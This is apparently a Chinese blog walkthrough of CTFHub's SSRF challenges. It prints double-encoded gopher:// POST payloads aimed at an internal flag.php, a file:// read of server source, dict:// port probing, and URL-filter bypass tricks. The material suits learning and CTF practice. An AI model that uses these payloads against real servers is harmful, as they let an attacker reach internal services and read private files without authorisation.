ctfhub--ssrf

已于 2022-07-11 10:30:28 修改
阅读量918 收藏 7
点赞数 3
分类专栏: web相关 ctf相关 文章标签: ctf
于 2022-06-10 16:22:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/125221655
版权

1.post请求

首先,访问index文件

这一段的意思就是这个地方存在用curl请求数据的漏洞

两个文件

 

从第二张图可以看出来,我们需要向 /flag.php 发送一个POST的请求包,请求包内容为key,key在第一张图已经得到了

构造POST请求包

访问flag.php页面,通过修改html页面得到提交的按钮,如下

得到提交按钮后,将key填入输入框然后调教,并bp抓包

获得数据包后将数据包的内容拿去url编码

编码网站:CTF在线工具-在线URL编码|URL解码 (hiencode.com)

得到第一次编码:

POST%20/flag.php%20HTTP/1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Type%3A%20application/x-www-form-urlencoded%0AContent-Length%3A%2036%0A%20%0Akey%3De9816343438c44ed037dc74e05f02b1c

其中,需要将 %0A 替换成 %0D%0A ,因为%0A是linux系统的换行符,我们是Windows系统,因此需要换成 %0D%0A或%0d%0a

替换的小技巧:复制文本到txt中,利用txt完成替换

全部替换一次即可 

关于第二次编码:

因为我们是通过curl的伪协议:gopher发送请求包,因此需要第二次编码

第二次编码结果

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c

数据包准备好后,就可以向flag.php文件发送了

使用:

1.链接?url=gopher://127.0.0.1:80/_

2.两次编码后的结果
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e

3.payload为:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A101.0%2529%2520Gecko/20100101%2520Firefox/101.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250AOrigin%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-85c812e011304b2a.sandbox.ctfhub.com%253A10800/%253Furl%253Dhttp%253A//127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Akey%253D353819242683f9148b813faf1691976e

 补充:curl的伪协议

1.gopher协议

gopher协议支持发出GET,POST请求,可以先拦截get请求包和post请求包,再构造符合gopher的请求。

作用:可以攻击内网的FTP,Telnet,Redis,Memcache,还可以攻击内网未授权的MySQL

语法:

gopher://IP:Port/_{TCP/IP数据流}


{TCP/IP数据流} 就是你要发送的包

如上文,我要构造的payload为
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/


_{TCP/IP数据流}就是 _POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c
(post请求包两次编译后)


组合起来就是
http://challenge-f34bdf386ecf053f.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A36%250D%250A%250D%250Akey%253De9816343438c44ed037dc74e05f02b1c

2.file协议和dict协议

file协议实现任意文件读取

?url=file:///var/www/html/index.php

dict协议实现内网端口探测

?url=dict://127.0.0.1:20/info

curl的几个函数

1.curl_init()

初始化一个curl会话,初始化后的向量可以使用curl_setopt(),curl_exec()和 curl_close()函数

$ch = curl_init();

2.curl_setopt

更加具体参数请访问下列连接:

PHP curl_setopt函数 | 菜鸟教程 (runoob.com)

设置一个curl传输选项,使用如下

语法:curl_setopt(resource $ch, int $option, mixed $value)

以ctfhub--sstf----post请求为例,访问index.php源码,可以看到以下代码

curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);         
//设置url

curl_setopt($ch, CURLOPT_HEADER, 0);                     
//启用时会将头文件的信息作为数据流输出

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
//在使用CURLOPT_FOLLOWLOCATION产生的header中的多个locations中持续追加用户名和密码信息,即使域名已发生改变。

3.curl_exec()

执行curl会话

4.curl_close()

关闭curl会话

URL Bypass

url绕过

1.@绕过

payload: http://notfound.ctfhub.com@127.0.0.1/flag.php

@的语法:@前面的是访问用户,后面的是访问地址

 2.不能用点分十进制:  用其他进制的或者localhost

 IP地址进制转换 (520101.com)

3.302 

在线短地址转换工具-BeJSON.com

考点:url短地址的重定向,url短地址的目的是未来是一些较长的url缩短。

原理:通过ip构造一个较短的地址,访问这个地址会出现302状态,而302为临时重定向。相当于本来url1直接解析到 ip地址,但现在由于url1太长了不方便记忆和使用,引入了一个好记的url2,我们通过访问url2,url2定向到url1,url1再定向到ip地址 

4.DNS重绑定

看源码,找绕过

jjj34
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile及sql文件的过渡会做适当的修改(或者重写,因为有的过渡按给的文件运行不起来。。可能是我打开的方式不对),对于大部分没有的版本,会自己编写(复制粘贴)提供相应的文件 如有bug,还望知道 建造 每道译文对应的端口需要自行在run脚本中更改 cd the_challenge chmod 777 build run ./build ./run 分类 SQLi RCE XSS SSRF 未盐化 文件包含 XXE 科学技术研究院
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:fire: 自卫队 :fire: v1.12最新 burp的SSRF插件,可在所有请求中自动进行SSRF检测 如果您遇到任何问题或想要下面未列出的新功能,请在此表格中创建一个新的问题 即将发布的功能清单 :check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载 它将很快能够测试Json和XML 测试SMTP SSRF 如何安装/建造 git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在build / libs下找到文件“ ssrf-king.jar”,然后可以将其导入Burpsuite。 另外,goto可以下载编译的文件。 特征 :check_mark: 测试所有外部交互的请求。 :check_mark: 检查是否有任何交互不是用户IP(如果有的话),它是一个开放的重定向。 :check_mark: 提醒用户任何外部交互,包括以下信息:
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHUB-WEB-POST请求
carrot11223的博客
10-27 180
可以知道访问这个文件的时候,我们需要从127.0.0.1的地址进入,然后同时提交一个key,才可以输出$flag,但问题是我们怎么从本地换回地址进入呢,想了想试试XFF,不行,那就上网搜,然后找到一个协议gopher,它可以确保从127.0.0.1去发送,这个协议有一个具体的格式,url=gopher://127.0.0.1:80/_POST要发送的数据。运行python 1.py,直接替换,文件目录如下,将要替换的内容放到url…进行编码的时候也要注意了,第一次选1,第二次选2。
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1281
ctfhub ssrf post小记
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2647
SSRF相关题目实战
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 7742
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
SSRF详解 基于CTFHub(上篇)
Bossfrank的博客
04-28 1743
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6094
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
Ctfhub-POST请求
鸣蜩十四的博客
08-09 3241
在题目中的环境初始链接为:http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=_ 我们先用file://协议对index.php页面源码进行读取,http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php,然后发现有一个/flag.php的页面,然后同样对其源码进行读取 得到index.php的页面源码如
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
CTFHUB-SSRF-POST请求(小宇特详解)
小宇的web博客
10-23 3243
CTFHUB-SSRF-POST请求 这里先说一下这里你需要知道的东西 而不是只会做题,不知道其所以然 这里我先说一下这里题里说的302跳转在这里发挥了什么作用 302跳转的302是http状态码 表示请求的网页自请求的网页移动到了新的位置,搜索引擎索引中保存原来的URL 这里可以通过访问302.php,并且传参gopher来伪造本地访问 Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gop
CTF gopher协议
a3320315的博客
11-03 7195
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
CTFHub_Web_SSRF_POST
阿刁〇的博客
08-08 920
CTFHub_Web_SSRF_POST 首先,简单来了解一下SSRF SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形 成由服务器发起请求的一个漏洞。让服务器去请求通常请求不到的东西。 一般用来在外网探测或攻击内网服务。 SSRF漏洞形成的原因多事服务端提供了从外部服务获取数据的功能,但没有对目标地址、协议等重要参数进行过滤和限制,从而导致攻击者可以自由构造参数,而发起预期外的请求 漏洞成因 相关函数 file_get_conte
CTFHUB SSRF 【全】
Jay17的博客
04-17 1207
CTFHUB SSRF 题解 【全】
HTTP 请求方法
weixin_40910372的博客
07-02 435
HTTP 请求方法 根据 HTTP 标准,HTTP 请求可以使用多种请求方法。 HTTP1.0 定义了三种请求方法: GET, POST 和 HEAD方法。 HTTP1.1 新增了五种请求方法:OPTIONS、PUT、PATCH、DELETE、TRACE 和 CONNECT 方法。 序号 方法 描述 1 GET 请求指定的页面信息,并返回实体主体。 2 ...
node-v0.10.9-sunos-x86.tar.gz
最新发布
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值